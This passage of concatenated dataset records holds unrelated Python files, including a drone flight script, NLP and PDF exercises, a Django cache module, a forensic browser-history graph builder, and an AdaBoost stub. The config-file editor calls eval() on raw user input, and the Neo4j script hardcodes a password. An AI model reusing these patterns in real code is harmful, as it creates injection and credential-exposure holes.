os.system(\"setterm -cursor on\")\n raise","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"287422614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n© Copyright 2015-2016, 3D Robotics.\n\nchannel_overrides.py: \n\nDemonstrates how to set and clear channel-override information.\n\n# NOTE: \nChannel overrides (a.k.a \"RC overrides\") are highly discommended (they are primarily implemented \nfor simulating user input and when implementing certain types of joystick control).\n\nThey are provided for development purposes. 
Please raise an issue explaining why you need them\nand we will try to find a better alternative: https://github.com/dronekit/dronekit-python/issues\n\nFull documentation is provided at http://python.dronekit.io/examples/channel_overrides.html\n\"\"\"\nfrom __future__ import print_function\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nimport time\n\nimport signal\nimport sys\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n while vehicle.armed:\n vehicle.armed = False\n\n vehicle.close()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n#Set up option parsing to get connection string\nimport argparse \nparser = argparse.ArgumentParser(description='Example showing how to set and clear vehicle channel-override information.')\nparser.add_argument('--connect', \n help=\"vehicle connection target string. If not specified, SITL automatically started and used.\")\nparser.add_argument('--manual', \n help=\"Setup the sequence in manual mode, otherwise stabilize\")\nargs = parser.parse_args()\n\nconnection_string = args.connect\nmanual_mode = False\nif args.manual:\n manual_mode = True\n\n# Connect to the Vehicle\nprint('Connecting to vehicle on: %s' % connection_string)\nvehicle = connect(connection_string, wait_ready=False)\n\ntime.sleep(10)\n\nprint(\"Starting\")\nif manual_mode:\n print(\"Using manual mode\")\n vehicle.mode = VehicleMode(\"MANUAL\")\nelse:\n print(\"Using stabilize mode\")\n vehicle.mode = VehicleMode(\"STABILIZE\")\n\nvehicle.armed = True\n# Confirm vehicle armed before attempting to take off\nwhile not vehicle.armed:\n print(\" Waiting for arming...\")\n time.sleep(0.1)\n\n# Override channels\nprint(\"\\nChannel overrides: %s\" % vehicle.channels.overrides)\n\n#vehicle.wait_ready(True)\n\nv = 200\ndef pwm(channel, direction):\n return {channel : 1500 + (v * direction)}\n\n#UP = pwm('3', -1)\n#DOWN = pwm('3', 1)\n#FORWARD = pwm('4', 1)\n#BACKWARD = pwm('4', -1)\n#RIGHT = pwm('5', 1)\n#LEFT = pwm('5', -1)\n\nAVANCE = 1\nDROITE = 2\nBAS = 3\n\nNORMAL = 1\nREVERSE = -1\n\ndef print_action(a, direction):\n if a == AVANCE:\n print(\"going forward\")\n if a == DROITE:\n print(\"going right\")\n if a == BAS:\n print(\"going down\")\n print(direction)\n\n\ndef action(a, direction, t):\n print_action(a, direction)\n for i in range(t * 100):\n if not vehicle.armed:\n vehicle.armed = True\n if a == AVANCE:\n vehicle.channels.overrides['5'] = 1500 + (v * direction)\n if a == DROITE:\n vehicle.channels.overrides['4'] = 1500 + (v * direction)\n if a == BAS:\n vehicle.channels.overrides['3'] = 1500 + (v * direction)\n time.sleep(1. 
/ 100)\n reset()\n\ndef reset():\n vehicle.channels.overrides['3'] = 1500\n vehicle.channels.overrides['4'] = 1500\n vehicle.channels.overrides['5'] = 1500\n time.sleep(1.)\n\nreset()\n \n#------------- START SEQUENCE\n#action(BAS, REVERSE, 1) # Descend\naction(AVANCE, NORMAL, 12) # Forward\naction(DROITE, NORMAL, 2) # Left\naction(AVANCE, NORMAL, 12) # Forward\naction(DROITE, REVERSE, 2) # Right\naction(AVANCE, NORMAL, 12) # Forward\n#action(BAS, NORMAL, 5) # Climb\n#------------- END SEQUENCE\nreset()\nreset()\nreset()\n\nwhile vehicle.armed:\n vehicle.armed = False\n\ntime.sleep(2)\n\n#Close vehicle object before exiting script\nprint(\"\\nClose vehicle object\")\nvehicle.close()\n\n\nprint(\"Completed\")\n","sub_path":"test/channel_overrides.py","file_name":"channel_overrides.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"390453174","text":"\"\"\"\n70. Obtaining and shaping the data\nUsing the gold-standard data for sentence polarity analysis,\ncreate the gold-standard data (sentiment.txt) as follows.\n\nPrepend the string \"+1 \" to every line of rt-polarity.pos\n(the polarity label \"+1\" and a space, followed by the content of a positive sentence)\n\nPrepend the string \"-1 \" to every line of rt-polarity.neg\n(the polarity label \"-1\" and a space, followed by the content of a negative sentence)\n\nConcatenate the contents of 1 and 2 above and shuffle the lines randomly\n\nOnce sentiment.txt is created,\ncheck the number of positive examples (positive sentences) and negative examples (negative sentences).\n\"\"\"\nimport random\n\nall_content_list = []\nwith open('data/rt-polaritydata/rt-polarity.pos') as f1:\n for line in f1:\n all_content_list.append('+1' + '\\t' + line)\n\nwith open('data/rt-polaritydata/rt-polarity.neg') as f2:\n for line in f2:\n all_content_list.append('-1' + '\\t' + line)\n\n\nrandom.shuffle(all_content_list)\nf = open('data/sentiment.txt', 'w')\nfor line in all_content_list:\n f.write(line)\nf.close()\n\npos_counter = 0\nneg_counter = 0\nwith open('data/sentiment.txt', encoding='utf-8') as f:\n for line in f:\n content_list = line.split()\n if content_list[0] == '+1':\n pos_counter += 1\n if content_list[0] == '-1':\n neg_counter += 1\n\nprint('+1 size is ' + str(pos_counter))\nprint('-1 size is ' + str(neg_counter))\n","sub_path":"NLP_100knock/chapter8/70.py","file_name":"70.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"16187419","text":"import os\n\n\ndef file_handle(array, func_type, res=None):\n if func_type == query:\n with open('文件.conf', 'r', encoding='utf-8') as read_f:\n tag = False\n res = []\n for item in read_f:\n # strip any spaces, \\n or \\t around the string in the file before comparing\n if item.strip() == 'backend %s' % array: # in the file there is a space between 'backend' and what follows\n tag = True\n continue\n if tag and item.startswith('backend'):\n break\n if tag:\n print('\\033[35m%s\\033[0m' % item, end='')\n res.append(item)\n return res\n if func_type == change:\n with open('文件.conf', 'r') as read_f, \\\n open('new_文件.conf', 'w') as write_f:\n tag = False\n tag1 = True\n for item in read_f:\n if item.strip() == array: # found the 'backend www.hjc1.org' line in the file\n tag = True # flip the state of tag\n continue # keep reading the next line\n\n if tag: # the data to modify starts on the line after 'backend www.hjc1.org'\n if tag1:\n res.insert(0, '%s\\n' % array) # res does not contain 'backend www.hjc1.org', so add it back ourselves\n for record in res: # loop over the updated 'backend www.hjc1.org' block, line by line\n write_f.write(record) # write each line into the new file\n tag1 = False\n\n if tag and item.startswith('backend'):\n tag = False\n if not tag: # outside the matched block, copy the file content into the new file line by line\n write_f.write(item)\n os.remove('文件.conf') # delete the original file\n os.rename('new_文件.conf', '文件.conf') # rename the modified file back to the original name\n return res\n\n\ndef add():\n print('\\033[34;4m Welcome to the add function\\033[0m')\n pass\n\n\ndef delete():\n 
print('\\033[33;4m Welcome to the delete function\\033[0m')\n pass\n\n\ndef change(array):\n print('\\033[32;4m Welcome to the change function\\033[0m')\n backend = array[0]['backend'] # gets www.hjc1.org\n backend_data = 'backend %s' % backend # gets 'backend www.hjc1.org'\n old_record = '%sserver %s %s weight %s max %s\\n' % ( # misspell a word here and you will regret it forever\n ' ' * 4,\n array[0]['record']['server'],\n array[0]['record']['server'],\n array[0]['record']['weight'],\n array[0]['record']['max'],\n )\n new_record = '%sserver %s %s weight %s max %s\\n' % (\n ' ' * 4,\n array[1]['record']['server'],\n array[1]['record']['server'],\n array[1]['record']['weight'],\n array[1]['record']['max'],\n )\n res = query(backend) # get the return value of query() and assign it to res\n if not res or old_record not in res: # if the query result is empty, or the record to change is not in the returned value\n print('The value you want to modify is not in the file')\n else:\n count = res.index(old_record) # find the index of the record to change in the returned list\n res[count] = new_record # put the updated value at the matching position in the returned list\n\n return file_handle(backend_data, func_type=change, res=res)\n\n\ndef query(array):\n print('\\033[31;4m Welcome to the query function\\033[0m')\n\n return file_handle(array, func_type=query)\n\n\nif __name__ == '__main__':\n msg = \"\"\" Available functions:\n 1: \"add\",\n 2: 'delete',\n 3: 'change',\n 4: 'query',\n ('q', 'Q'): 'quit'\n \"\"\"\n msg_func = {\n '1': add,\n '2': delete,\n '3': change,\n '4': query,\n }\n # below are the record to modify and the updated record\n my = [{'backend': 'www.hjc1.org', 'record': {'server': '10.10.70', 'weight': 20, 'max': 30}},\n {'backend': 'www.hjc1.org', 'record': {'server': '1.1.7', 'weight': 2, 'max': 3}}]\n while True:\n print(msg, sep='\\n')\n choice = input('Please choose a function: ').strip()\n if not choice:\n continue\n if choice.upper() == 'Q':\n break\n data = input('Please enter the data to operate on: ').strip()\n if choice != '4':\n data = eval(data)\n ret = msg_func[choice](data)\n print('\\033[45mThis is the return value\\033[0m:', ret)\n\n","sub_path":"code/Day21/decopled_程序的解藕.py","file_name":"decopled_程序的解藕.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"540658045","text":"from django.db.models.signals import m2m_changed, post_delete, post_save\nfrom django_redis import get_redis_connection\n\nfrom .utils import invalid_cache, CACHEME, CACHEME_DICT\n\nfrom cacheme import cacheme as BaseCacheMe\n\n\nclass CacheMe(BaseCacheMe):\n\n def collect_sources(self):\n models = self.kwargs.get('invalid_models', [])\n m2m_models = self.kwargs.get('invalid_m2m_models', [])\n results = set()\n\n for model in models:\n model.signal_type = 'ONE'\n results.add(model)\n\n for model in m2m_models:\n model.signal_type = 'M2M'\n results.add(model)\n return results\n\n def connect(self, model):\n if model.signal_type == 'ONE':\n post_save.connect(invalid_cache, model)\n post_delete.connect(invalid_cache, model)\n\n if model.signal_type == 'M2M':\n post_save.connect(invalid_cache, model)\n post_delete.connect(invalid_cache, model)\n m2m_changed.connect(invalid_cache, model)\n\n\nredis_connection = get_redis_connection(CACHEME.REDIS_CACHE_ALIAS)\nCacheMe.set_connection(redis_connection)\nCacheMe.update_settings(CACHEME_DICT)\n","sub_path":"django_cacheme/cache_model.py","file_name":"cache_model.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"294985119","text":"\"\"\"add nexapi\n\nRevision ID: cd89a8474017\nRevises: 51f5ccfba190\nCreate Date: 2017-07-19 10:17:38.371924\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'cd89a8474017'\ndown_revision = '51f5ccfba190'\n\nfrom alembic import op\nimport sqlalchemy as 
sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('nex_api_case',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('url', sa.String(length=100), nullable=True),\n sa.Column('request_type', sa.String(length=100), nullable=True),\n sa.Column('request_data', sa.Text(), nullable=True),\n sa.Column('expectation', sa.String(length=1000), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('nex_api_case')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cd89a8474017_add_nexapi.py","file_name":"cd89a8474017_add_nexapi.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640714532","text":"from py2neo import Graph, Node, Relationship\r\nimport pandas as pd\r\n\r\n\r\n# MATCH (u:User)-[r]-(b)-[r2]-(c) WHERE c.file_extension = '.py' OR c.url CONTAINS 'python' RETURN u,r,b,r2,c\r\n\r\nswInstallPath = \"extracted_data\\\\PsCSV\\\\SoftwareInstalled.csv\"\r\nmruPath = \"extracted_data\\\\PsCSV\\\\mru.csv\"\r\n\r\nchromeBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeBookmarks.csv\"\r\nchromeDownloadPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeDownloads.csv\"\r\nchromeHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeHistory.csv\"\r\nfirefoxBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaBookmarks.csv\"\r\nfirefoxeDownloadPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaDownloads.csv\"\r\nfirefoxHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaHistory.csv\"\r\nieBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\ieBookmarks.csv\"\r\nieHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\ieHistory.csv\"\r\n\r\nfileExPath = \"extracted_data\\\\fileCSV\\\\getall.csv\"\r\n\r\nuserAcc = \"WeiHan The Analyst\"\r\n\r\nclass MainNode:\r\n def __init__(self):\r\n self.components = []\r\n\r\n def add_component(self, regComp):\r\n self.components.append(regComp)\r\n\r\nclass RegSW:\r\n def __init__(self):\r\n self.softwares = []\r\n\r\n def add_swobj(self, swI):\r\n self.softwares.append(swI)\r\n\r\nclass RegMRU:\r\n def __init__(self):\r\n self.mru = []\r\n\r\n def add_mru(self, recentItem):\r\n self.mru.append(recentItem)\r\n\r\nclass FireChrome:\r\n def __init__(self):\r\n self.history = []\r\n self.bookmarks = []\r\n self.downloads = []\r\n\r\n def add_history(self, hist):\r\n self.history.append(hist)\r\n\r\n def add_bookmarks(self, bookm):\r\n self.bookmarks.append(bookm)\r\n\r\n def add_downloads(self, downl):\r\n self.downloads.append(downl)\r\n\r\nclass IntExplorer:\r\n def __init__(self):\r\n self.history = []\r\n self.bookmarks = []\r\n\r\n def add_history(self, hist):\r\n self.history.append(hist)\r\n\r\n def add_bookmarks(self, bookm):\r\n self.bookmarks.append(bookm)\r\n\r\nclass CompFiles:\r\n def __init__(self):\r\n self.files = []\r\n\r\n def add_files(self, extractedFiles):\r\n self.files.append(extractedFiles)\r\n\r\nclass SoftwareInstalled:\r\n def __init__(self, swName, swVersion, swPublisher, swInstallDate):\r\n self.name = swName\r\n self.version = swVersion\r\n self.publisher = swPublisher\r\n 
self.installDate = swInstallDate\r\n\r\nclass History:\r\n def __init__(self, url, title):\r\n self.url = url\r\n self.title = title\r\n\r\nclass IEHistory:\r\n def __init__(self, url):\r\n self.url = url\r\n\r\nclass Bookmarks:\r\n def __init__(self, url, title):\r\n self.url = url\r\n self.title = title\r\n\r\nclass Downloads:\r\n def __init__(self, name, source):\r\n self.name = name\r\n self.source = source\r\n\r\nclass ExFiles:\r\n def __init__(self, name, time, fullpath, size, hexsig, extn, magicmatch):\r\n self.name = name\r\n self.dateTime = time\r\n self.fullPath = fullpath\r\n self.sizeKB = size\r\n self.hexSig = hexsig\r\n self.extn = extn\r\n self.magicmatch = magicmatch\r\n\r\nclass DFGraph:\r\n def __init__(self):\r\n self.graph = Graph(password=\"ict2202\")\r\n self.graph.delete_all()\r\n self.transaction = self.graph.begin()\r\n\r\n def clear_graph(self):\r\n self.graph.delete_all()\r\n\r\n def add_node(self, node):\r\n self.transaction.create(node)\r\n\r\n def add_relationship(self, relation):\r\n self.transaction.create(relation)\r\n\r\n def commit_tx(self):\r\n self.transaction.commit()\r\n\r\ndef registryGraph():\r\n registry = MainNode()\r\n regSW = RegSW()\r\n regMRU = RegMRU()\r\n swdf = pd.read_csv(swInstallPath)\r\n for index, row in swdf.iterrows():\r\n regSW.add_swobj(SoftwareInstalled(row['DisplayName'], row['DisplayVersion'], row['Publisher'], row['InstallDate']))\r\n mrudf = pd.read_csv(mruPath)\r\n for index, row in mrudf.iterrows():\r\n regMRU.add_mru(row['MRU'])\r\n registry.add_component(regSW)\r\n registry.add_component(regMRU)\r\n return registry\r\n\r\ndef browserGraph():\r\n browser = MainNode()\r\n chrome = FireChrome()\r\n firefox = FireChrome()\r\n ie = IntExplorer()\r\n chromeBookdf = pd.read_csv(chromeBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in chromeBookdf.iterrows():\r\n chrome.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n chromeHistdf = pd.read_csv(chromeHistoryPath, encoding = 'unicode_escape')\r\n for index, row in chromeHistdf.iterrows():\r\n chrome.add_history(History(row['URL'], row['Title']))\r\n chromeDldf = pd.read_csv(chromeDownloadPath, encoding = 'unicode_escape')\r\n for index, row in chromeDldf.iterrows():\r\n chrome.add_downloads(Downloads(row['Name'], row['Source']))\r\n ffBookdf = pd.read_csv(firefoxBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in ffBookdf.iterrows():\r\n firefox.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n ffHistdf = pd.read_csv(firefoxHistoryPath, encoding = 'unicode_escape')\r\n for index, row in ffHistdf.iterrows():\r\n firefox.add_history(History(row['URL'], row['Title']))\r\n ffDldf = pd.read_csv(firefoxeDownloadPath, encoding = 'unicode_escape')\r\n for index, row in ffDldf.iterrows():\r\n firefox.add_downloads(Downloads(row['Name'], row['Source']))\r\n ieBookdf = pd.read_csv(ieBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in ieBookdf.iterrows():\r\n ie.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n ieHistdf = pd.read_csv(ieHistoryPath, encoding = 'unicode_escape')\r\n for index, row in ieHistdf.iterrows():\r\n ie.add_history(IEHistory(row['URL']))\r\n browser.add_component(chrome)\r\n browser.add_component(firefox)\r\n browser.add_component(ie)\r\n return browser\r\n\r\ndef fileGraph():\r\n fileAnalysis = MainNode()\r\n compFiles = CompFiles()\r\n exFilesdf = pd.read_csv(fileExPath)\r\n for index, row in exFilesdf.iterrows():\r\n compFiles.add_files(ExFiles(row['Title'], row['Time'], row['FullPath'], row['LengthInKB'], 
row['HexSignature'], row['FileExtn'], row['Result']))\r\n fileAnalysis.add_component(compFiles)\r\n return fileAnalysis\r\n\r\nif __name__ == \"__main__\":\r\n graph = DFGraph()\r\n user = Node(\"User\", name=userAcc)\r\n graph.add_node(user)\r\n\r\n registry = registryGraph()\r\n swReg = Node(\"Registry\", name=\"Software Installed\")\r\n mruReg = Node(\"Registry\", name=\"Most Recently Used\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", swReg))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", mruReg))\r\n for softwares in registry.components[0].softwares:\r\n graph.add_node(Relationship(swReg, \"Extracted Info\", Node(\"Softwares\", name=softwares.name, version=softwares.version, publisher=softwares.publisher, install_date = softwares.installDate)))\r\n for index, mru in enumerate(registry.components[1].mru):\r\n graph.add_node(Relationship(mruReg, \"Extracted Info\", Node(\"MRU\", name=mru, used_order=index+1)))\r\n\r\n browser = browserGraph()\r\n chrome = Node(\"Browser\", name=\"Chrome\")\r\n firefox = Node(\"Browser\", name=\"Firefox\")\r\n ie = Node(\"Browser\", name=\"Internet Explorer\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", chrome))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", firefox))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", ie))\r\n for history in browser.components[0].history:\r\n graph.add_node(Relationship(chrome, \"Visits\", Node(\"History\", url=history.url, title=history.title)))\r\n for download in browser.components[0].downloads:\r\n graph.add_node(Relationship(chrome, \"Downloads\", Node(\"Downloads\", name=download.name, source=download.source)))\r\n for bookmark in browser.components[0].bookmarks:\r\n graph.add_node(Relationship(chrome, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n for history in browser.components[1].history:\r\n graph.add_node(Relationship(firefox, \"Visits\", Node(\"History\", url=history.url, title=history.title)))\r\n for download in browser.components[1].downloads:\r\n graph.add_node(Relationship(firefox, \"Downloads\", Node(\"Downloads\", name=download.name, source=download.source)))\r\n for bookmark in browser.components[1].bookmarks:\r\n graph.add_node(Relationship(firefox, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n for history in browser.components[2].history:\r\n graph.add_node(Relationship(ie, \"Visits\", Node(\"History\", url=history.url)))\r\n for bookmark in browser.components[2].bookmarks:\r\n graph.add_node(Relationship(ie, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n\r\n fileAnalysis = fileGraph()\r\n sysFile = Node(\"Files in System\", name=\"User Files\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", sysFile))\r\n for files in fileAnalysis.components[0].files:\r\n graph.add_node(Relationship(sysFile, \"Contains\", Node(\"Files\", name=files.name, date_time_accessed=files.dateTime, full_path=files.fullPath, size_KB=files.sizeKB, hex_signature=files.hexSig, file_extension=files.extn, magic_number_match=files.magicmatch)))\r\n\r\n graph.commit_tx()\r\n","sub_path":"ProjectGUI/userProfiling.py","file_name":"userProfiling.py","file_ext":"py","file_size_in_byte":9368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557892354","text":"import os\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\npath = \"../../practice_files\"\n\ninput_file_path = os.path.join(path, 
'ugly.pdf')\noutput_file_path = os.path.join(os.curdir, 'output')\n\nif not os.path.exists(output_file_path):\n os.mkdir('output')\n\ninput_pdf = PdfFileReader(input_file_path)\noutput_pdf = PdfFileWriter()\n\nnum_pages = input_pdf.getNumPages()\nfor n in range(0, num_pages):\n page = input_pdf.getPage(n)\n if n % 2 == 0:\n page.rotateClockwise(90)\n output_pdf.addPage(page)\n\nwith open(os.path.join(output_file_path, 'The Conformed Duckling.pdf'), 'wb') as pdf_file:\n output_pdf.write(pdf_file)","sub_path":"chapters/13/examples/13_2/rotating-pdf-example.py","file_name":"rotating-pdf-example.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27118006","text":"try:\n from hypothesis import given\n from hypothesis.strategies import (\n integers, floats, booleans, one_of, complex_numbers,\n lists, sets, fractions, text\n )\nexcept ImportError:\n import logging\n logging.error(\n \"'hypothesis' package was not found, so our propery-based tests \"\n \"could not be run.\\n\"\n \"Consider installing the missing package with:\\n\"\n \"\\tpip3 install hypothesis\"\n )\n # replace all strategies with noops to avoid undefined names\n # and make \"given\" skip tests\n from tensorflow_mcmc.tests.property_based.skip_tests import given, noop\n integers = noop\n floats = noop\n booleans = noop\n one_of = noop\n complex_numbers = noop\n lists = noop\n sets = noop\n fractions = noop\n text = noop\n\n\nimport unittest\nfrom tensorflow_mcmc.bayesian_neural_network import generate_batches\n\n\ndef batch_generator(X=None, y=None,\n x_placeholder=None, y_placeholder=None,\n seed=None, batch_size=10):\n return generate_batches(X=X, y=y,\n x_placeholder=x_placeholder,\n y_placeholder=y_placeholder,\n seed=seed,\n batch_size=batch_size)\n\n\ndef random_nonint_input_type_strategy():\n return one_of(\n floats(), booleans(), complex_numbers(),\n lists(integers(), max_size=10), sets(integers(), max_size=10),\n fractions(), text()\n )\n\n\nclass TestInvalidInputs(unittest.TestCase):\n @given(random_nonint_input_type_strategy())\n def test_invalid_input_type_batch_size(self, batch_size):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(batch_size=batch_size))\n )\n\n @given(integers(max_value=0))\n def test_invalid_integer_batch_size(self, batch_size):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(batch_size=batch_size))\n )\n\n @given(random_nonint_input_type_strategy())\n def test_invalid_input_type_seed(self, seed):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(seed=seed))\n )\n","sub_path":"sgmcmc/tensorflow_mcmc/tests/property_based/test_hypothesis_batch_generator.py","file_name":"test_hypothesis_batch_generator.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"598579434","text":"from fraccion import Fraccion\n\ndef carga(i):\n auxnum = int(input(\"ingrese el numerador \"+str(i)+\"\\n\"))\n auxden = 0 \n while (auxden == 0):\n auxden=int(input(\"ingrese el denominador \"+str(i)+\"- no puede ser cero \\n\"))\n return Fraccion(auxnum,auxden)\n\nfraccion1 = carga(1)\nfraccion2 = carga(2)\n\nfraccion1.mostrar()\nfraccion2.mostrar()\nopcion = int(input(\"1. sumar \\n 2. restar \\n 3. multiplicar \\n 4. 
dividir \\n\"))\n\nif (opcion==1): \n resultadoSuma = fraccion1.sumar(fraccion2)\n print(\"la suma es:\")\n resultadoSuma.mostrar()\nelif(opcion ==2):\n resultadoResta = fraccion1.resta(fraccion2)\n print(\"La resta es:\")\n resultadoResta.mostrar()\nelif(opcion==3):\n resultadoMulti = fraccion1.multiplicacion(fraccion2)\n print(\"la multiplicacion es:\")\n resultadoMulti.mostrar()\nelif(opcion==4):\n resultadoDiv = fraccion1.division(fraccion2)\n print(\"La division es:\")\n resultadoDiv.mostrar()\nelse:\n print(\"error\")\n\n","sub_path":"2022/Fraccion/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"282001577","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nimport numpy as np\nimport subprocess\n\na = float(input(\"Enter lattice constant a: \"))\nb = float(input(\"Enter lattice constant b: \"))\nc = float(input(\"Enter lattice constant c: \"))\ndkv = float(input(\"Enter spacing: \"))\n\"\"\"\nenter path\n\"\"\"\nb1x = (2.0*np.pi/a)*(1.0/np.sqrt(3))\nb1y = -(2.0*np.pi/a)\nb1z = 0.0\n\n\nb2x = (2.0*np.pi/a)*(1.0/np.sqrt(3))\nb2y = (2.0*np.pi/a)\nb2z = 0.0\n\nb3x = 0.0\nb3y = 0.0\nb3z = (2.0*np.pi/c)\n\nf = open('bandkpt.in','w') \nf.write(\"%f\\n\"% dkv)\nf.write(\"{} {} {}\\n\".format(b1x,b2x,b3x))\nf.write(\"{} {} {}\\n\".format(b1y,b2y,b3y))\nf.write(\"{} {} {}\\n\".format(b1z,b2z,b3z))\nf.write(\"0 -1 0 2 # M\\n\")\nf.write(\"0 0 0 1 # {/Symbol G}\\n\")\nf.write(\"1 -2 0 3 # K\\n\")\nf.write(\"0 -1 0 2 # M\\n\")\n\nf.close()\n\ncmd = subprocess.Popen('cmd.exe /C perl band_kpoint.pl bandkpt.in')\n","sub_path":"k-points/k-point_hexagonal.py","file_name":"k-point_hexagonal.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"648233855","text":"import math\nimport numpy as np\nfrom problem2 import DT,Node\n#-------------------------------------------------------------------------\n'''\n Problem 5: Boosting (on continous attributes). \n We will implement AdaBoost algorithm in this problem.\n You could test the correctness of your code by typing `nosetests -v test5.py` in the terminal.\n'''\n\n#-----------------------------------------------\nclass DS(DT):\n '''\n Decision Stump (with contineous attributes) for Boosting.\n Decision Stump is also called 1-level decision tree.\n Different from other decision trees, a decision stump can have at most one level of child nodes.\n In order to be used by boosting, here we assume that the data instances are weighted.\n '''\n #--------------------------\n @staticmethod\n def entropy(Y, D):\n '''\n Compute the entropy of the weighted instances.\n Input:\n Y: a list of labels of the instances, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n e: the entropy of the weighted samples, a float scalar\n Hint: you could use np.unique(). 
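For example, with Y = [1, 1, 0] and D = [0.5, 0.25, 0.25], the weighted class probabilities are p(1) = 0.75 and p(0) = 0.25, so e = -0.75*log2(0.75) - 0.25*log2(0.25) ≈ 0.811.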
\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n list_y = set([Y[i] for i in range(len(Y))])\n e = 0\n for y_value in list_y:\n sub_y = D[Y == y_value]\n prob = np.sum(sub_y)\n if prob != 0:\n e += -prob * np.log2(prob)\n\n\n\n\n #########################################\n return e \n \n #--------------------------\n @staticmethod\n def conditional_entropy(Y,X,D):\n '''\n Compute the conditional entropy of y given x on weighted instances\n Input:\n Y: a list of values, a numpy array of int/float/string values.\n X: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n ce: the weighted conditional entropy of y given x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n x_list = set([X[i] for i in range(X.shape[0])])\n ce = 0.0\n\n for x_value in x_list:\n sub_y = Y[X == x_value]\n sub_d = D[X == x_value]\n dSum = np.sum(sub_d)\n if dSum != 0:\n sub_d_in = sub_d / dSum\n else:\n sub_d_in = sub_d\n temp_ce = DS.entropy(sub_y, sub_d_in)\n ce += dSum * temp_ce\n\n\n\n \n #########################################\n return ce \n\n #--------------------------\n @staticmethod\n def information_gain(Y,X,D):\n '''\n Compute the information gain of y after spliting over attribute x\n Input:\n X: a list of values, a numpy array of int/float/string values.\n Y: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n g: the weighted information gain of y after spliting over x, a float scalar\n '''\n #########################################\n ## INSERT YOUR CODE HERE\n\n\n\n\n g = DS.entropy(Y, D) - DS.conditional_entropy(Y, X, D)\n #########################################\n return g\n\n #--------------------------\n @staticmethod\n def best_threshold(X,Y,D):\n '''\n Find the best threshold among all possible cutting points in the continous attribute of X. The data instances are weighted. \n Input:\n X: a list of values, a numpy array of int/float values.\n Y: a list of values, a numpy array of int/float/string values.\n D: the weights of instances, a numpy float vector of length n\n Output:\n Output:\n th: the best threhold, a float scalar. \n g: the weighted information gain by using the best threhold, a float scalar. 
